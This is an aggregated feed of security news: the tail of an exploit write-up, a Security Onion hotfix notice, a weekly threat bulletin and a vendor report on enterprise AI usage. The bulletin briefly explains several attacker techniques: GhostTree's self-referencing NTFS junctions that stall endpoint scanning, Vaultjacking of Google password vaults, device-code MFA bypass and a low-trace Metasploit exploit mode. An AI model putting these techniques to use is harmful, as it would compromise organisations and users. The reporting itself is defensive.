Restrict repository creation (MAX_CREATION_LIMIT = 0 in app.ini) to prevent users from creating their own repositories
Audit rebase merge settings

Rapid7 has also made a Metasploit module that automates the full exploit chain against both Linux and Windows targets. The module supports two modes: a default mode where a temporary repository is created under the attacker's account, the exploit is run, and the repository is deleted. The second approach targets a repository that the attacker already has write and merge access to.

"When the attacker creates and deletes their own repository, the only trace is an HTTP 500 in the server logs," the cybersecurity expert said. "When exploiting an existing repository, additional artifacts remain."

from The Hacker News https://ift.tt/Hrzs9ZX
via IFTTT

Security Onion 3.1.0 Hotfix 20260528 Now Available!

Last week, we released Security Onion 3.1.0:

https://blog.securityonion.net/2026/05/security-onion-310-now-available-with.html

Today we are releasing a hotfix which resolves two known issues in that release:

https://docs.securityonion.net/en/3/main/release-notes/

from Security Onion https://ift.tt/wZtH0Vy
via IFTTT

ThreatsDay Bulletin: Claude Security Plugin, Azure Priv-Esc, Kali365 MFA Bypass, FIFA Scams +15 More

Every time you think the industry has finally stopped doing some reckless, low-effort crap, somebody spins up a fresh box full of sketchy loaders, fake installers, recycled social-engineering bait, and enough exposed infrastructure to make you wonder if prod is just a public beta now - meanwhile some researcher casually drops a technique that turns a "minor" foothold into total account compromise because apparently six digits and blind trust were all that stood between your vault and getting absolutely pwned. Cool. Great. Love that for us.

Then there's the supply chain mess... signed binaries, poisoned updates, legit tooling getting hijacked like it's still 2017, plus a few reports this week that feel less like advanced tradecraft and more like watching skiddies discover low-hanging fruit with enterprise branding slapped on top. The weird part isn't that it works. The weird part is how damn easy it still is.

Anyway. Grab caffeine. Let's get into it.

Hunt.io said it identified more than 1,350 command-and-control (C2) servers across 98 Middle East infrastructure providers over the past three months, between February 1 and May 1, 2026. "C2 infrastructure dominates malicious activity (~96.8%), far exceeding phishing infrastructure (~0.5%) and publicly reported IOCs (~0.5%), while malicious open directories account for the remaining ~2.2% of observed artifacts," it said. "Saudi Arabia's STC (Saudi Telecom Company) hosts 981 C2 servers, representing 72.4% of all detected C2 infrastructure in the region. IoT-focused botnets (Hajime, Mozi, and Mirai) combined with offensive frameworks (Tactical RMM, Cobalt Strike, Sliver) represent the dominant malware families operating across Middle Eastern infrastructure."
AKS privilege escalation flaw
Microsoft is said to have silently fixed a privilege escalation flaw in Azure Backup for AKS that allowed a user with only the "Backup Contributor" Azure role (zero Kubernetes permissions) to gain cluster-admin on any AKS cluster, per security researcher Justin O'Leary. The vulnerability, which does not have a CVE, carries a CVSS score of 9.9. While Microsoft rejected the vulnerability report as "AI-generated content," it appears to have been patched since, and additional validation checks were enforced that did not exist in March 2026.
Cybercrime operator jailed
A 46-year-old Romanian national found guilty of breaking into an Oregon state government office in 2021 and other cyber attacks across the U.S. has been sentenced to 56 months in prison. Catalin Dragomir pleaded guilty to one count of aggravated identity theft and one count of obtaining information from a protected computer in February. Dragomir was arrested in Romania in November 2024 and extradited to the U.S. in January 2025 to face charges. Dragomir "sold access to a computer on the network of an Oregon state government office after obtaining unauthorized access to it in June of 2021," the Justice Department said. "During the sale, Dragomir provided the prospective buyer with samples of personal identifying information from the computer. He also sold access to the computer networks of numerous other victims in the United States, causing losses of at least $250,000."
DAEMON Tools added to KEV
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added the supply chain attack targeting DAEMON Tools software to its Known Exploited Vulnerabilities (KEV) catalog, requiring Federal Civilian Executive Branch (FCEB) agencies to apply necessary fixes by May 30, 2026. The incident is now being tracked under the identifier CVE-2026-8398 (CVSS v4 score: 9.3). "Attackers gained unauthorized access to the vendor's (AVB Disc Soft) build or distribution infrastructure and trojanized three binaries: DTHelper.exe, DiscSoftBusServiceLite.exe, and DTShellHlp.exe," according to the description of the CVE. "These files were digitally signed with the legitimate AVB Disc Soft code-signing certificate, allowing the malicious installers to appear trustworthy and bypass signature-based detection."
Apple unveils PQC code
Apple has published its post-quantum cryptography (PQC) implementations in corecrypto, including quantum-secure ML-KEM and ML-DSA algorithms, along with mathematical verification tools that it built to assure compliance with FIPS 203 and FIPS 204 specifications for independent evaluation by experts. "Corecrypto is used continuously in our products, providing encryption and decryption, hashing, random number generation, and digital signatures on over 2.5 billion active devices," Apple said. "A critical bug in corecrypto has the potential to compromise the security and reliability of every app and feature that depends on it, so we are conservative when adding new code to the library and make exceptional efforts to be comprehensive in our testing."
Law firms targeted by SRG
The U.S. Federal Bureau of Investigation (FBI) has warned that the threat actor known as the Silent Ransom Group (SRG), also known as Luna Moth, Chatty Spider, and UNC3753, has been targeting law firms using social engineering techniques as part of fresh attacks since spring 2026. Law firms are a rich target due to the highly sensitive nature of the data they possess. "Through phone calls and phishing emails, SRG actors pose as IT support to establish access to victim computers and exfiltrate data, usually through legitimate remote access tools or by sending an individual in-person to the victim company's location to gain physical access to computers," the FBI said. "While SRG has victimized companies in many sectors, including those in the insurance, finance, and healthcare industries, the group has consistently targeted U.S.-based law firms since Spring 2023." As part of the scheme involving in-person visits, the threat actor tells the victim they need to image the device or create a backup file to address potential impacts from the phishing email. Upon gaining a foothold, the attackers move swiftly to escalate privileges and pivot to data exfiltration without encryption. "By sending someone in-person to the victim's location to facilitate the intrusion, SRG actors exfiltrate data to an external hard drive or USB drive inserted by the threat actor into the victim's computer," the FBI added.
Fake installers spread Deno RAT
Attackers are hosting counterfeit installers and plugins masquerading as popular software, including ChatGPT, Claude, ZENOLOGY, Ableton Live, AutoTune, and Kontakt, on GitHub and SourceForge to distribute a Deno backdoor known as DinDoor (aka Tsundere). "Attackers are using compromised YouTube channels to distribute links to these platforms," Malwarebytes said. "DinDoor ultimately drops different types of malware, including a stealthy remote access Trojan (RAT), which also uses the Deno JavaScript runtime."
PureLogs phishing wave
A phishing campaign is using deceptive emails disguised as purchase orders to trick recipients into opening malicious JavaScript files contained within RAR archives that lead to the deployment of a PureLogs variant to steal sensitive data from the victim's device. "Upon analyzing the PureLogs module, the malware's primary capability is to collect sensitive data from the victim's system, including basic hardware and system information, saved credentials, cryptocurrency-related data, and more," Fortinet said. "The malware then compresses and encrypts the collected data before transmitting it to the C2 server."
U.K. targets crypto sanctions evasion
The U.K. has announced sanctions against cryptocurrency exchanges and the A7 network used by Russia to evade existing restrictions. Among those hit by sanctions is HTX (aka Huobi Global), which is one of the largest cryptoasset exchanges in the world, with $3.3 trillion in trading volume in 2025. "It is suspected of providing services to A7, the sanctioned Russian payments network, and Garantex, the sanctioned cryptocurrency exchange," Elliptic said. It's worth noting that the A7 corporate-and-token infrastructure emerged in the wake of the March 2025 Garantex takedown. Per data from TRM Labs, Huobi has sent more than $4.9 billion in direct on-chain transactions to U.K.-sanctioned and A7-network entities since 2021. Other entities hit by sanctions include Bitpapa and Rapira Group, the latter of which has transacted $375.6 million with Garantex's named successor Grinex.io.
Claude gains built-in code review
Anthropic has announced two new security features for its Claude AI: a self-hosted sandbox for Claude Managed Agents and a new security-guidance plugin. "The security guidance plugin makes Claude review its own code changes for common vulnerabilities while it works and fixes what it finds in the same session," Anthropic said. "The plugin catches issues such as injection, unsafe deserialization, and unsafe DOM APIs before the code reaches a pull request, reducing how much security review falls to human reviewers downstream. Once installed, the plugin runs automatically. There is nothing to invoke and no separate command to remember." As described by Red Hat, a self-hosted sandbox "outsources the 'thinking' while keeping the 'doing' on your own infrastructure."
DACH cyberattacks jump 124%
Data from Check Point has revealed that hacktivism and ransomware targeting organizations across Germany, Austria, and Switzerland increased 124% in 2025. More than 60% of the hacktivist incidents have involved defacing websites to amplify political messaging. These efforts originated from NoName057(16), Mr Hamza, chinafans, Dark Storm Team, and Hezi Rash. Ransomware attacks, on the other hand, were mainly led by Akira, Qilin, and Safepay. "Germany accounted for more than 80% of regional incidents, with Switzerland at 12% and Austria at 8%," Check Point said. "Across Europe, the DACH region represented 18% of all recorded attacks, placing Germany above France, Spain, and Italy by individual country share."
World Cup scams explode online
Threat actors are increasingly capitalizing on the public excitement around the FIFA World Cup 2026 for scam campaigns. Bitdefender said it has identified more than 55 football-related malvertising campaigns targeting users through fake online stores, social media ads, IPTV piracy operations, fraudulent football apps, and FIFA-themed giveaway and lottery scams distributed through email. "The most-targeted users were in the United Kingdom, Portugal, Spain, Algeria, the United States, Canada, Mexico, Belgium, Germany, Brazil, and Australia," the Romanian company said. Check Point said bad actors are "flooding the internet" with fake merchandise stores, fraudulent betting platforms, and phishing domains designed to steal personal data and money. Host nations of the sporting event, Canada, Mexico, and the U.S., have also recorded an increase in the weekly average number of cyber-attacks per organization in April 2026, with Mexico registering a weekly average of 3,548 cyber attacks per organization. Group-IB said it uncovered six distinct fraud schemes and over 4,300 fraudulent domains impersonating FIFA's official web presence. This includes a sophisticated phishing campaign conducted by a Chinese-speaking, financially motivated operator called GHOST STADIUM that involves using more than 300 domains using a shared phishing kit that exploits FIFA's PingIdentity SSO login flow to harvest credentials and conduct fake ticket sales and payment fraud at scale. "GHOST STADIUM has built a pixel-perfect clone of the official FIFA website, complete with a replicated single sign-on (SSO) authentication flow, and multi-language support in 11 languages," Group-IB said. "Facebook Ads serves as the primary paid traffic acquisition channel for the GHOST STADIUM campaign."
Chrome extensions harvest WhatsApp data
Cybersecurity researchers have uncovered a 126-extension Chrome Web Store extension network dubbed WaSteal that masquerades as independent WhatsApp CRM tools while exfiltrating user personal data, advertising cookies, and voice messages to operator-controlled servers, affecting nearly 148,000 users. According to researcher Jean-Marie R., the network is operated by wascript.com.br, which operates a white-label platform. "The largest variant (WaSeller, 100k installs) embeds a live GTM container giving its operator silent, permanent remote code execution with no extension update or Chrome review required," the researcher said. "The operator's own privacy policy directly contradicts every behavior documented."
GhostTree breaks endpoint scanning
A new technique named GhostTree abuses NTFS junctions to generate infinite file paths, causing endpoint security products to hang and leave files unscanned. "We discovered that by pointing a junction back at its own parent directory, an attacker can create recursive loops that generate effectively infinite file paths," Varonis said. "With just two lines of code, a user can generate endless valid paths, making it impossible to finish scanning parent directories with the dir command recursively. The same applies to EDR products that scan folders for malicious files. An attacker places malware in the parent directory, sets up the GhostTree structure, and the containing folder becomes effectively unscannable. The scan hangs. The malicious files go unexamined."
Kali365 targets Microsoft 365
An emerging Phishing-as-a-Service (PhaaS) platform called Kali365, first observed in April 2026, has been targeting Microsoft 365 environments. "Kali365 has primarily been distributed via Telegram, enabling cyber threat actors to obtain Microsoft 365 access tokens and bypass multi-factor authentication (MFA) protocols without intercepting the user's credentials," the FBI said. "Through the Kali365 platform subscription, cyber threat actors can capture 'OAuth' tokens and gain persistent access to targeted individuals/entities' Microsoft 365 environments." Like other PhaaS platforms, Kali365 risks lowering the barrier of entry to cybercrime, offering less-technical attackers access to artificial intelligence (AI)-generated phishing lures, automated campaign templates, real-time targeted individual/entity tracking dashboards, and OAuth token capture capabilities. Kali365 is available to affiliates on a subscription basis, ranging from $250 for 30 days to $2,000 for a year. In a report published last month, Arctic Wolf said it observed a device code phishing campaign using Kali365 to obtain initial access and conduct follow-on activity. "The campaign relied on high-fidelity lures directing victims to Microsoft's legitimate device login flow, where users unknowingly authorized threat actor-initiated sessions," the company said. "Captured OAuth access and refresh tokens enabled immediate mailbox access and post-compromise activity. In select cases, threat actors established malicious inbox rules to suppress security notifications, extending dwell time and reducing user awareness." Barracuda Networks and Proofpoint have also warned of a spike in device code phishing campaigns in recent months. Barracuda said it detected more than 7 million device code attacks between March and April 2026. "The surge of device code phishing is the natural progression of credential phishing, as more people become aware of multi-factor authentication bypass techniques, criminals must get creative," Proofpoint noted.
Vaultjacking targets Google passwords
PhishU has detailed a new technique called Vaultjacking, which demonstrates how a victim's 6-digit Google Password Manager (GPM) PIN captured via an adversary-in-the-middle (AitM) phishing page can be used to decrypt the entire synced GPM vault. "That single PIN releases Google's Security Domain Secret, which decrypts every synced password and passkey on the account -- not just the credential being registered, the entire vault," Curtis Brazzell, PhishU Flounder and CEO, said in a statement. Once the AitM page harvests the user's session cookies and GPM PIN, a threat actor can add a passkey to the victim's Google account for persistence and then unlock the victim's entire synced credential vault from their own infrastructure.
Signed RVTools trojan spreads RAT
A trojanized MSI installer for RVTools is being used to deploy a modular Python-based remote access trojan (RAT) using a VBScript loader. The malware includes a reconnaissance module that fingerprints the host and maps out Active Directory and a persistent command-and-control (C2) agent that encrypts stolen data and waits for operator commands. "What made this campaign particularly effective was the use of a legitimately issued Sectigo code-signing certificate, registered under what appears to be a shell entity - Xiamen Lunwei Huage Network Co.(Sectigo), Ltd," K7 Labs said. "At the time of delivery, the certificate was fully valid, meaning Windows SmartScreen and most endpoint controls raised no flags. It has since been revoked, though it offers limited protection to environments not enforcing real-time OCSP or CRL checks at execution time."

None of this was especially sophisticated. That's the lesson nobody wants to hear. Most breaches still start with trust abuse, stale configs, lazy access controls, or users getting socially engineered by someone sounding vaguely competent over the phone.

Patch faster. Audit harder. Stop assuming signed software, MFA prompts, or "internal-only" tooling means safe. The attackers already figured out the shortcuts. Might be time defenders stop pretending those shortcuts don't exist.

from The Hacker News https://ift.tt/PHGkB1R
via IFTTT

New AI Usage Report: Enterprise AI Risk Is Heavily Concentrated Among a Small Group of AI "Power users"

State of AI Usage Report 2026 (full report here) by LayerX Security reveals the extent of the enterprise AI visibility gap and why most organizations still don't understand where their AI exposure is actually coming from. The research shows that enterprise AI risk is not distributed evenly across users or platforms. Instead, it is heavily concentrated among a small group of AI power users and a handful of dominant AI platforms that drive the majority of enterprise AI activity and sensitive data exposure.

At the same time, AI usage is rapidly fragmenting across personal accounts, AI browser extensions, embedded copilots, AI connectors, and secondary AI tools operating outside traditional visibility and governance controls. The result is a fragmented AI ecosystem that most organizations still cannot fully see or govern.

While AI Is Everywhere in the Enterprise, Most Employees Are Casual

The common perception is that "everyone uses AI now". The report paints a much more nuanced picture. While nearly half of enterprise users interacted with AI tools over the past year, only 18% use AI on a weekly basis. This suggests that most employees remain casual users.

At first glance, that sounds like good news for security teams. Fewer users should mean lower risk. But the report found the opposite.

Enterprise AI activity is heavily concentrated among a very small group of employees. While half of the users had 12 AI conversations or fewer, the top 5% generated at least 144 conversations. These same users also engaged in much deeper interactions, averaging 18 prompts per conversation compared to the average of 2.

This creates a new class of "AI power users" that conduct far more conversations, interact across multiple AI platforms, and engage in significantly deeper prompt chains than average employees.

The result: AI risk is not distributed evenly across the organization. A relatively small group of users drives a disproportionate amount of enterprise AI exposure.

ChatGPT Is Still Dominating Enterprise AI Usage, But Copilot is Coming Closer

Despite the rapid growth of enterprise copilots, ChatGPT remains the dominant AI platform inside enterprises by a significant margin. It accounts for 36% of enterprise AI users and more than 55% of all AI conversations. That gap matters because it shows ChatGPT users are far more active than users of competing platforms.

Copilot M365 is growing quickly, reaching 29% adoption and nearly a quarter of enterprise AI conversations. The growth of Copilot also signals something important: enterprise AI usage is starting to split between governed enterprise-native AI and consumer-driven AI adoption. But beyond those two leaders, most AI platforms remain far behind despite the attention they receive.

While Copilot M365 usage is largely tied to corporate-managed Microsoft environments, where organizations typically maintain stronger visibility and governance controls, Gemini presents a very different risk profile. Most enterprise Gemini usage still happens through the regular consumer version, not Gemini Enterprise. In many cases, employees access it through personal accounts and unmanaged environments. That means organizations often have little visibility into how data is retained, whether prompts are used for model training, or how enterprise information is ultimately handled.

The implication is significant: not all enterprise AI adoption carries the same level of risk. The real governance challenge increasingly comes from consumer AI usage operating inside enterprise workflows under the appearance of legitimate productivity tools.

Shadow AI Is No Longer A Few Applications; It's a Long Tail of Under-the-Radar AI Apps

Most organizations still think about Shadow AI as employees using an unapproved chatbot. That definition is already outdated.

The LayerX research shows that enterprise AI usage is rapidly fragmenting across a growing ecosystem of AI tools, embedded assistants, AI browser extensions, AI search engines, coding copilots, and AI-powered SaaS features that often operate outside traditional visibility and governance controls.

Nearly 30% of enterprise users already use multiple AI platforms, while the top 5% interact with six or more AI applications. Employees are no longer relying on a single assistant for isolated tasks. They are combining multiple AI systems inside the same workflows, often switching between tools depending on the task, data type, or convenience.

This is what modern Shadow AI actually looks like. It's the growing long tail of AI tools that organizations struggle to see, track, or govern. In many cases, organizations may not even realize AI is being used at all, creating a far larger governance challenge than most organizations anticipate.

Enterprise AI Usage Is Far More Personal Than Organizations Realize

Most organizations assume that if employees use AI for work, they will naturally use corporate-managed AI environments. But that's not true.

Nearly half of all enterprise AI conversations happen through personal identities rather than corporate-managed accounts. What's even more concerning is that over 14% of conversations conducted with corporate identities are tied to personal AI licenses.

This creates a major governance blind spot, as when employees use personal AI accounts, organizations lose visibility into retention policies, auditability, model training exposure, and how enterprise data is ultimately handled. Sensitive company information can move into external AI ecosystems without centralized oversight or policy enforcement.

What makes this particularly surprising is that the divide is not just about identities. It is increasingly shaping platform selection itself.

Enterprise-focused platforms such as Copilot M365 and Gemini Enterprise are used primarily through corporate-managed accounts. Meanwhile, platforms like ChatGPT, Claude, and DeepSeek remain dominated by personal usage.

This means the enterprise AI problem is no longer just about AI applications. It is increasingly becoming a "personal AI" and governance problem.

Sensitive Data Flows Into All AI Platforms, With DeepSeek and ChatGPT The Worst Culprits

The report found that more than 6% of enterprise AI conversations already contain sensitive data. We categorized the sensitive data to find that personal data was the most common category by far, appearing in 5.81% of conversations, while financial and IT-related data appeared less frequently but still represented meaningful exposure.

DeepSeek showed the highest sensitive data exposure rate at 12.63% of conversations. ChatGPT followed at 8.38%. Copilot M365 showed a significantly lower exposure rate at 3.65%.

This suggests enterprise-integrated AI platforms may operate within more controlled governance environments, while consumer-oriented AI tools continue to see much riskier usage patterns.

The question is no longer whether employees will share sensitive data with AI systems. They already are. The real challenge is understanding where it happens, how often, and through which identities and platforms.

AI Extensions and Connectors Are Quietly Expanding the AI Risk Surface

The report also highlights two fast-growing AI channels that many organizations are barely tracking today: AI browser extensions and AI connectors.

About 15% of enterprise users already run at least one AI browser extension. Nearly 75% of these extensions request high or critical browser permissions. More than 16% already have known vulnerabilities.

At the same time, AI connectors are increasingly linking AI systems directly to enterprise applications like SharePoint, GitHub, Slack, Atlassian, and Google Workspace.

This means that AI systems are no longer limited to employees manually pasting information into chatbot windows. They are increasingly being granted persistent, programmatic access to enterprise systems, documents, collaboration platforms, and internal knowledge repositories. This fundamentally changes the nature of enterprise AI risk.

Turning Insight Into Action: The Path Forward for CISOs

The report makes one thing clear: traditional AI governance approaches are falling behind how employees actually use AI. It outlines a clear direction for security leaders:

Identify and Monitor High-Risk AI Power Users: AI risk is highly concentrated among a small group of employees who rely heavily on AI across multiple platforms and expose significantly more sensitive data than average users. Treating all AI usage equally wastes resources and misses the highest-risk behavior.
Stop Focusing Only on "Approved AI": The biggest visibility gap is the growing long tail of AI tools, embedded assistants, browser extensions, AI search engines, and connectors quietly spreading across the enterprise.
Block Personal Account Usage as Active Shadow AI: Unmanaged personal AI accounts and personal AI licenses expose sensitive enterprise workflows to uncontrolled AI environments. Enforcing corporate AI identities and blocking personal account usage helps ensure that AI interactions, prompts, and data flows remain visible, governed, and protected under enterprise security controls.
Shift From "Block or Allow" to Inline AI Guardrails: Blocking AI outright is no longer realistic, and an "allow-all" approach is equally risky. Organizations need inline guardrails that monitor prompts, uploads, responses, and AI-driven actions in real-time to prevent sensitive data exposure without disrupting productivity.

Download the full State of AI Usage report from here